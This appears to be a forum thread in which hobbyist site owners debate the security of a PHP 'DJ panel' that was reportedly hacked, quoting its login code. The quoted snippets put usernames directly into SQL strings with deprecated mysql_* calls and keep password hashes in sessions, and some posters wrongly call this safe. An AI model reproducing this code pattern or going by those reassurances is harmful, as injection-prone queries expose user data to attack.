Yeh, i use quickscriptz
But i need a more secure one.
Please help

How secure can you be?

I quite like Kristall-Panel RC2. I have edited it alot though, so its more secure.

the quickscriptz has been hacked 3 times
lol

the quickscriptz has been hacked 3 times
lol
I dont think its the panel, it will be your staff with passwords such as changeme.

We have made it so our passwords cant be changeme. And when a Radio Manager adds an account, there password is randomly generated. Best way to make it secure :D

Oh god, how does it get hacked though? LOL, I just checked "check.php" it sets a SESSION for a password? No wonder its insecure, I think the whole thing needs re-thinking but no offense to the creator.


I dont think its the panel, it will be your staff with passwords such as changeme.

We have made it so our passwords cant be changeme. And when a Radio Manager adds an account, there password is randomly generated. Best way to make it secure :D

I just checked one source of it, and I think its insecure.


$query = mysql_query("SELECT username,djname,passwrd,rank,email FROM rp_users WHERE username = '$username'") or die(mysql_error());
$row = mysql_fetch_array($query);
$_SESSION["rp_logged"] = TRUE;
$_SESSION["rp_username"] = $row['username'];
$_SESSION["rp_passwrd"] = $row['passwrd'];
$_SESSION["rp_djname"] = $row['djname'];
$_SESSION["rp_email"] = $row['email'];
$_SESSION["rp_rank"] = $row['rank'];

Oh god, how does it get hacked though? LOL, I just checked "check.php" it sets a SESSION for a password? No wonder its insecure, I think the whole thing needs re-thinking but no offense to the creator.



I just checked one source of it, and I think its insecure.


$query = mysql_query("SELECT username,djname,passwrd,rank,email FROM rp_users WHERE username = '$username'") or die(mysql_error());
$row = mysql_fetch_array($query);
$_SESSION["rp_logged"] = TRUE;
$_SESSION["rp_username"] = $row['username'];
$_SESSION["rp_passwrd"] = $row['passwrd'];
$_SESSION["rp_djname"] = $row['djname'];
$_SESSION["rp_email"] = $row['email'];
$_SESSION["rp_rank"] = $row['rank'];

So the panel can be hacked via that file?

Ever heard of session stealing? They publish the users password via a SESSION its like putting it on a file on your server and calling it index.html looooooool

Ever heard of session stealing? They publish the users password via a SESSION its like putting it on a file on your server and calling it index.html looooooool

Yeh but im just not sure exactly how it all works i mean i us cutenews but the person who hacked that didnt change anything he jus left a message saying delete search.php. I take it change.php with the dj panel works in the same way?

I dont understand, maybe hes using a PHP exploit?

Wellanyways ned to either make this DJ panel safe or get a safer one? Ay reccomends?

Lots of people out there to make bigger and better panels.

Ever heard of session stealing? They publish the users password via a SESSION its like putting it on a file on your server and calling it index.html looooooool

Drift, I think you're wrong about sessions being that easy to steal. The only reason that you could steal sessions from the Habbo site was that it had a vulnerability due to an XSS (Cross Site Scripting) issue. In general, you can't steal sessions, unless there is a browser exploit or some bad coding somewhere.

I recall that the problem with the Habbo website was that some input was loaded through a URL (GET) parameter and it wasn't filtered so things could be done. If you're interested in find out more, I suggets you read http://en.wikipedia.org/wiki/Session_hijacking and http://en.wikipedia.org/wiki/Cross-site_scripting.

Oh god, how does it get hacked though? LOL, I just checked "check.php" it sets a SESSION for a password? No wonder its insecure, I think the whole thing needs re-thinking but no offense to the creator.



I just checked one source of it, and I think its insecure.


$query = mysql_query("SELECT username,djname,passwrd,rank,email FROM rp_users WHERE username = '$username'") or die(mysql_error());
$row = mysql_fetch_array($query);
$_SESSION["rp_logged"] = TRUE;
$_SESSION["rp_username"] = $row['username'];
$_SESSION["rp_passwrd"] = $row['passwrd'];
$_SESSION["rp_djname"] = $row['djname'];
$_SESSION["rp_email"] = $row['email'];
$_SESSION["rp_rank"] = $row['rank'];


Ever heard of session stealing? They publish the users password via a SESSION its like putting it on a file on your server and calling it index.html looooooool

Sessions are on the remote server, and can't be edited, there is nothing wrong with that piece of code.

As long as the password is a hash, and not plaintext, setting it for a session is alright, not the best practice in the world, but no harm done.

With Habbo, they were getting the user's session ID, setting it as their own, then it would recognize you.. as them..

One little exploit in his coding could get the server to set false sessions, seeing as his sessions are used against the database Id say thats extremely vulnerable.


if($_SESSION['rp_logged'] == "TRUE") {
$username = $_SESSION['rp_username'];
$passwrd = $_SESSION['rp_passwrd'];
$rank = $_SESSION['rp_rank'];
$check = mysql_query("SELECT username, passwrd FROM rp_users WHERE username = '$username'")or die(mysql_error());

I don't see any exploits in that..

if($_SESSION['rp_logged'] == "TRUE") {
>> $username = $_SESSION['rp_username']; <<
$passwrd = $_SESSION['rp_passwrd'];
$rank = $_SESSION['rp_rank'];
$check = mysql_query("SELECT username, passwrd FROM rp_users WHERE username = ' >>> $username <<<'")or die(mysql_error());

I do I'm sorry if you don't I've had this problem in the past.

LOL, there is nothing wrong with that at all? Your just selecting something out of a database. I would rather use the ID instead of a username.

LOL, there is nothing wrong with that at all? Your just selecting something out of a database. I would rather use the ID instead of a username.

Yea but its going past one validation before it writes the new sessions?

I think that this system is easily exploitable by the right individual.

Mod can close this,
I got new panel :D !

Mod can close this,
I got new panel :D !
What panel you using?

Ever heard of session stealing? They publish the users password via a SESSION its like putting it on a file on your server and calling it index.html looooooool

Well I was about to start a big long rant about this until I saw these two posts below - just take a look at them, and yes the session that is being set contains the hashed password (I'm not stupid).


Drift, I think you're wrong about sessions being that easy to steal. The only reason that you could steal sessions from the Habbo site was that it had a vulnerability due to an XSS (Cross Site Scripting) issue. In general, you can't steal sessions, unless there is a browser exploit or some bad coding somewhere.

I recall that the problem with the Habbo website was that some input was loaded through a URL (GET) parameter and it wasn't filtered so things could be done. If you're interested in find out more, I suggets you read http://en.wikipedia.org/wiki/Session_hijacking and http://en.wikipedia.org/wiki/Cross-site_scripting.


Sessions are on the remote server, and can't be edited, there is nothing wrong with that piece of code.

As long as the password is a hash, and not plaintext, setting it for a session is alright, not the best practice in the world, but no harm done.

With Habbo, they were getting the user's session ID, setting it as their own, then it would recognize you.. as them..

Okay, now get ready for the [poop] to hit the fan....


if($_SESSION['rp_logged'] == "TRUE") {
>> $username = $_SESSION['rp_username']; <<
$passwrd = $_SESSION['rp_passwrd'];
$rank = $_SESSION['rp_rank'];
$check = mysql_query("SELECT username, passwrd FROM rp_users WHERE username = ' >>> $username <<<'")or die(mysql_error());

I do I'm sorry if you don't I've had this problem in the past.

In order for this to be a flaw, the user would have to create a session called "rp_username" that contained the malicious code. Problem here is that sessions are all server side therefore the user has no real control over them.

So, on a closing note, if you have the latest security updates to the panel then there is absolutely nothing [that I know of or that anyone has told me of] that would make the panel vulnerable to be hacked three different times.

What panel you using?
Using Kristall :)